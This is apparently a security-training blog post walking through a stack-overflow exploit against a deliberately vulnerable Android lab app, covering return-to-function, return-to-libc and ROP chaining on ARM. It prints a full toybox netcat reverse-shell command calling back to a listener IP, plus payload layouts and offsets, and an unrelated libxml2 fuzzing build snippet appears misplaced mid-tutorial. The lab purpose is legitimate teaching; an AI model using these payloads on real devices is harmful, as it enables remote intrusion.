Damn Exploitable Android App - Exploit Stack Overflow

Explore the mechanics of stack overflow vulnerabilities in our latest blog post. Learn how attackers can manipulate stack overflows to execute arbitrary code despite modern protections like DEP/NX. We delve into advanced bypass techniques such as 'return-to-function' and 'return-to-libc' attacks, providing a deep understanding of these critical security challenges.
Oct 16

Damn Exploitable Android App - Exploit Stack Overflow

Previous blogpost:
- Exploit Stack Overflow - Current Page

A stack overflow is a type of vulnerability where the stack, a region of memory used for storing local variables and control data, is written beyond its allocated size. This can lead to arbitrary code execution if an attacker can control the data that overflows the stack. Modern protection mechanisms like DEP/NX can prevent direct execution of shellcode on the stack. However, attackers have devised methods to bypass these protections, such as "return-to-function" and "return-to-libc" attacks.

Understanding Return to Function

In this technique, rather than attempting to execute shellcode directly on the stack, the attacker redirects the instruction pointer (e.g., by overwriting a function's return address) to a function already loaded into memory. This could be a function within the vulnerable application itself or within loaded libraries. For instance, if the program has a function that gives elevated privileges to a user, the attacker can overwrite the return address to point to this function, this allows them to take advantage of the program's features and initiate harmful actions.

Load libnative-lib.so from our vulnerable Android app into Ghidra to locate the function we aim to exploit.

Inspect the Symbol Tree and look for a function named “printLog”.
  1. Change to the directory: /home/fuzzing-android/Desktop/examples/fuzzing/opensource/libxml/libxml2-2.9.2/

  2. Create a new directory named build by running the command: mkdir build

  3. Change to the build directory: cd build

  4. Set the environment variables for Clang and Clang flags:

    export CC=clang
    export CFLAGS="-g -fsanitize=fuzzer-no-link,address,undefined \
         -fno-sanitize-recover=all \
         -DFUZZING_BUILD_MODE_UNSAFE_FOR_PRODUCTION"
    
  5. Configure the build by running: ../configure --without-python

    Copy testapi file to build direcorty: cp ../testapi.c testapi.c

  6. Build and install libxml2 by executing: make 

Examining the function printLog, we find that it doesn't need parameters for execution and this means our primary task would be to overwrite the PC register using the printLog address, When the printLog function is executed, it logs the message “You Won!” in Android.

Please follow our Damn Exploitable Android Ap - Lab Setup article for the lab step-up click here

To determine the address of printLog, connect a debugger to the vulnerable application and locate the printLog address

Displaying the printLog address in GDB
  • p printLog

Finding Offset to PC register

• To adapt the exploit to run the printLog function, we must identify the precise offset that will overwrite the PC register.

• To determine the offset, we can employ the "pattern create" command in gef to generate a random sequence.
By adjusting the exploit, we incorporated the random sequence generated by gef's pattern create command.

overflow = " REPLACE"
s.send(overflow)

After executing the exploit, we observe that the PC register has been overwritten with 0x63616164
Let's employ gef's pattern offset <PC address> command to determine the offset by supplying the PC's value.
  • pattern offset 0x63616164
Having determined that the offset is 212, sending a string of 212 'A's followed by four times 'B' to the application would result in the targeted memory location being overwritten with the 'B' value.

Modifying exploit with the correct offset and a value which we would like overwrite PC with 
Connect the debugger to the application and run the exploit to confirm that the PC value has been overwritten with the anticipated value.
We observe that the PC register is now being overwritten with the value 0x42424242, which corresponds to 'BBBB'.

Thumb Mode

"Thumb" is one of the execution states in the ARM architecture, a leading instruction set architecture for embedded and mobile devices. ARM processors support multiple instruction sets, and "Thumb" is one of them.
It uses 16-bit wide fixed-length instructions. This results in a smaller code size compared to ARM mode. However, because of the reduced instruction width, Thumb instructions can represent a subset of the functionality available in ARM mode.

To address this, ARM introduced Thumb-2 technology in ARMv7-A and ARMv7-R profiles, which added 32-bit instructions to provide more functionality without sacrificing code density.

Run the updated exploit using the printLog address for the PC value. Due to the thumb mode, it's essential to add 1 to the printLog address.
PrintLog function calls android log print function is part of Android's native logging system.

We need use adb logcat to see the log, run the following command.

  • adb logcat | grep "You won!"

Run your modified exploit and go back to your logcat screen to verify that our exploit worked

Try this lab on ARM64 for free!

We have also prepared a Try-out lab that showcases this on ARM64 using our cutting edge Platform. There is no installation needed and you can start doing the same lab on our platform, see for more information:

https://www.mobilehackinglab.com/course/tryout-labs

Understanding Return-to-libc

This is a specific type of RTF attack where the attacker uses functions from the C standard library (libc). The most classic example is redirecting the instruction pointer to the system() function, a part of libc, to execute arbitrary commands.

For a successful exploitation on ARM, attackers meticulously configure the memory layout. Due to the ARM calling convention, the primary argument for a function is passed using the R0 register. Hence, when orchestrating the return-to-libc attack targeting the system() function, the attacker ensures that the desired command string is appropriately loaded into the R0 register, enabling the intended command execution.

Both of these techniques exploit the fact that while the stack memory might not be executable due to DEP/NX, the memory regions housing the loaded libraries (like libc) are executable. By manipulating the control flow of the program and making it execute existing functions in unintended ways, attackers can achieve their goals without having to introduce and execute their shellcode directly.

Address Space Layout Randomization (ASLR) randomizes the memory locations of loaded libraries, making "return-to-libc" attacks harder because the attacker cannot easily predict the exact memory address of functions like system().

However, attackers then evolved their techniques further with "return-oriented programming" (ROP) to chain together small snippets of code ("gadgets") already present in memory to create their malicious payloads.

Rop Chaining

Return-Oriented Programming (ROP) is an advanced exploitation technique that allows an attacker to execute arbitrary code on a system, even if protections like non-executable stack or heap (NX or DEP) are in place. ROP is commonly used to bypass these security mechanisms by using existing code snippets, known as "gadgets", from the loaded libraries or the binary itself.

Gadgets: In ROP, an attacker doesn't inject new code. Instead, they chain together snippets of existing code, called "gadgets". Each gadget typically ends with a ret (return) instruction, which is how ROP gets its name.

Chaining Gadgets: By carefully selecting and chaining gadgets, an attacker can effectively "program" the desired malicious behavior using the existing code. The attacker overwrites return addresses on the stack to control the sequence in which gadgets are executed.

ROP in Practice: To exploit a vulnerable application using ROP, an attacker usually: Finds a vulnerability that allows them to overwrite the stack or control the flow of execution.
Maps out available gadgets.

Chains these gadgets to form a "ROP chain" that accomplishes their goals, like bypassing a security mechanism or running a shell.
When passing arguments to functions in return-oriented programming, the key is to set the values in registers appropriately. This task can be accomplished using specific code snippets, commonly known as 'gadgets'. A prime example of such a gadget is pop {r0, r1, r2, pc}, which extracts four values from the stack, placing them into the designated registers.

The beauty of this approach is that since we have mastery over the stack's data, we can insert any value of our choosing. This capability empowers us to set our registers and tailor function parameters to our needs seamlessly.
If we would like to execute the “system” libc function to execute arbitrary command we need to look at the function definition:
In the ARM architecture, when calling functions, arguments are typically passed using registers before resorting to the stack. The order of these registers is a well-defined convention. Here's how it works

ARM Function Calling Convention:
    First Argument: r0
    Second Argument: r1
    Third Argument: r2
    Fourth Argument: r3

successfully pass arguments for execution, especially when considering the system function in libc to execute an arbitrary command, we must adhere to the function's definition.

The address of our intended command should be placed in the r0 register, given that it's the primary argument. To facilitate this, a particularly useful gadget, pop {r0, pc}, is crucial. By executing this gadget, our specified values are retrieved and fed into the system function, allowing us to run our commands seamlessly.

Finding the ROP Gadget

When exploiting binaries, especially in the context of Return-Oriented Programming (ROP), the search for gadgets is of paramount importance. Gadgets are short sequences of instructions that end in a ret (return) instruction. Ropper is one of the premier tools for this purpose, enabling an attacker or researcher to discover potential gadgets in a binary. Let’s dive into how we can utilize ropper to uncover these valuable sequences.

Following command to use and find the rop gadget using ropper
  • ropper –f /home/fuzzing-android/Desktop/gdb_sysroot_armv7/system/lib/libc.so
We discovered the ROP gadget pop {r0, pc}, which is used to place the argument for the system function into the r0 register and subsequently invoke the system function.

Exploit string layout during exploitation

A*212 + pop_gadget + address_command + address_system

Let's experiment with our exploit using placeholder values while employing the actual gadget. We'll set a breakpoint at the gadget's address to verify if our dummy values are correctly loaded into the r0 register.

A*212 + pop_gadget + AAAA + BBBB

With the libc base that we've derived and leaked, we can now append the offset of our pop_gadget address.


Start by restarting the application. Once restarted, attach the debugger and set a breakpoint at our pop_gadget location address. After that, run your exploit against the application and be sure to take note of the subsequent observations.

Use the following command in GDB to set a breakpoint at our pop_gadget

B *0xaf816470

Looking at the debugger, we can observe that we're in control of the data on the stack, and the program counter (PC) is now pointing to our pop_gadget
Use following command in GDB to Continue or Step into
  • Step into (si)
  • Continue (c)
After stepping into our pop_gadget (which is pop {r0, pc}), r0 is directed towards our string, while the Program Counter (PC) points to the subsequent string (this will be the address of the system function).

Using a sequence of 212 'A's followed by the pop_gadget, then the address_command (which points to the payload we wish the system to execute), next the address_system(address of system function), and finally the string “mkdir hacking”( place holder for the payload).

Note: It's important to clarify that address_command is the location pointing to the payload that will be executed by the system function.

We can now utilize the top of our leaked stack to pinpoint our manipulated data for loading. We can then designate this address as the lead argument and insert mock values for system_args to confirm that the system function initiates a call to our placeholder data."

Execute the exploit and examine the registers; you'll notice R0 is directed towards the data we control on the stack.
We now only need to replace our system variable with the correct libc system address, Since we already calculated the libc base address we just need the offset to system and Getting system address in gdb
  • p system
We now require the libc base address to determine the offset for the system function's address, Use the command below in GDB to retrieve the libc base address.
  •   vmmap libc.so
Calculating the offset for system function.
  • system_address - libc_base = offset
  • 0xb361fdd8 – 0xb35db000 = 0x44DD8

Modify our exploit to hold the correct system offset address
As previously highlighted in the blog, use System + 1 to execute in THUMB mode.

Abusing Toybox for reverse shell

Toybox is a collection of Unix utilities in a single executable file. On Android, it serves to replace several similar utilities such as "Busybox." In the context of Android exploitation, if an attacker gains a shell access to an Android device, they might find toybox utilities present which can be potentially abused for various malicious purposes including establishing a reverse shell.

It replaces similar utilities like Busybox on many Android installations. Utilities like netcat, which can be found in some versions of Toybox, can be extremely useful for malicious activities.

Toybox is available in Android from Android 6
  • Lets test netcat to get a reverse shell, Setup a listener on your base machine.
  • nc –lv 4444
  • Test the following command from your device
  • toybox nc {IP} {{PORT} | sh
  • Sending command but no response back?
Interestingly, while our command has been executed on the device, the listener side isn't displaying the output.
To channel the STDIN/STDOUT through nc, we first need to remove any existing files of the same name.

Then, using mkfifo, we'll create a file. We'll direct both the input and output from this file to the /system/bin/sh STDIN & STDOUT. After setting this up, we'll run Toybox nc to connect back to our listener, while redirecting its output to our mkfifo file.

NOTE
: The application can only write in his own Sandbox environment!

”rm /data/data/com.example.mynativetest/f;/system/bin/toybox mkfifo /data/data/com.example.mynativetest/f;cat /data/data/com.example.mynativetest/f|/system/bin/sh -i 2>&1|/system/bin/toybox nc 192.168.192.31 4444 >/data/data/com.example.mynativetest/f”

Examine our mkfifo reverse shell within our adb environment.

  • Setup a listener on your base machine
  • nc –lv 4444
  • Execute our command on device
  • NOTE: Change the IP address to your base machine
We've successfully obtained a fully operational shell.
We're now prepared to incorporate this section into our primary exploit code. Additionally, for correct string termination, it's essential to append a zero byte to the end of our string.
Let's evaluate our exploit. To do this, set up a netcat listener on the primary machine.
Execute the exploit.
Ola! Enjoy your reverse shell!

Summary

Return-to-Function and Return-to-Libc are powerful technique that redirect a program's flow to leverage existing code to the attacker's advantage. In the context of Android, when exploiting vulnerabilities, an attacker can employ these techniques for privilege escalation or to execute arbitrary commands. 

Next Article
:
- Executing Shellcode 

In addition, we've set up a device that can support the operation of the Damn Exploitable Android app. In our upcoming article titled "Executing Shellcode". Shellcode plays a pivotal role, especially in exploitation techniques and post exploitation techniques to bypass the sandbox.

However, modern operating systems have ramped up their security by employing mechanisms like Data Execution Prevention (DEP). DEP prevents certain regions of memory, such as the stack, from being executed. As such, even if an attacker successfully injects malicious shellcode, it might not run due to these protections.

Enter mprotect: a Unix system call that can alter memory protection attributes. When used astutely, it can turn non-executable regions of memory into executable ones, enabling our shellcode to run.

Stay tuned for this deep dive as we unravel possible targets to focus on, leveraging these tools to expose vulnerabilities and learn how to build an exploit for an Android Device running on an Armv7 Processor.

Got Excited? Check out our Trainings!

During the full course you will learn how to do more advanced fuzzing and learn more exploitation techniques like heap exploitation on Arm64 devices using our cutting-edge platform.

No installation
is needed as we provide you with Cloud VM's that have every tool installed and provide your with Android 13 devices running on ARM64 devices through our platform. 

Check out our course "Android Userland Fuzzing and Exploitation": https://www.mobilehackinglab.com/course/android-userland-fuzzing-and-exploitation 

Want to try out our labs first?

https://www.mobilehackinglab.com/course/tryout-labs